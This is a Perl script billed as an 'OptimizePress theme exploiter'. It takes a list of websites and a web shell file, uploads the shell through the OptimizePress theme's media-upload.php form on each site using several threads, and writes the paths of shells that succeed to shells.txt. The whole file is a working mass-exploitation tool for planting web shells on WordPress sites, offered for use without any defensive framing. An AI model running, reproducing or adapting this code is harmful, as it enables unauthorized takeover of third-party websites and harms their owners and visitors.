OptimizePress theme exploiter

1. # OptimizePress theme exploiter
2. use WWW::Mechanize;
3. use threads;
4. defined($ARGV[0] && $ARGV[1] && $ARGV[2]) ? $file = $ARGV[0] : die "+ usage: perl $0 sites.txt shell.phtml threads\n";
5. print "[+] OptimizePress Theme Exploiter\n";
6. $shell = $ARGV[1];
7. $thr = $ARGV[2];
8. open(sites,"<".$file) or die $!;
9. while($site = <sites>)
10. {
11. chomp($site);
12. $site = cleanurl($site);
13. push(@threads, threads->create (\&ex, $site));
14. sleep(1) while(scalar threads->list(threads::running) >= $thr);
15. }
16. eval {
17. $_->join foreach @threads;
18. @threads = ();
19. };
20. close(sites);
21. sub ex {
22. print " + $site | ";
23. eval{
24. $ex = WWW::Mechanize->new(timeout => 10);
25. $ex->get("http://".$_[0]."/wp-content/themes/OptimizePress/lib/admin/media-upload.php");
26. $ex->submit_form(
27. form_id => "csimgupload",
28. fields => {
29. newcsimg => $shell
30. });
31. };
32. if($ex->content() =~ /<img src=\"(.*?)$ARGV[1]"/)
33. {
34. print "Shell: ".$1.$ARGV[1]."\n";
35. # OPEN AND WRITE IN FILE
36. open(save, '>>shells.txt');  
37. print save "Shell: ".$1.$ARGV[1]."\n";  
38. close(save);
39. # open(my $fh, '>', 'shells.txt');
40. # print $fh "Shell: ".$1.$ARGV[1]."\n";
41. # close $fh;
42. # OPEN AND WRITE IN FILE
43. }else{
44. print "failed\n";
45. }
46. }
47. sub cleanurl {
48. $_[0] =~ /http[s]?:\/\/[www\.]{3}?[\.]?/g ? $_[0] =~ s/http[s]?:\/\/[www\.]{3}?[\.]?//g : "";
49. $_[0] =~ /http[s]?:\/\//g ? $_[0] =~ s/http[s]?:\/\///g : "";
50. $_[0] =~ /[\/]$/m ? $_[0] =~ s/[\/]$// : "";
51. return $_[0];
52. }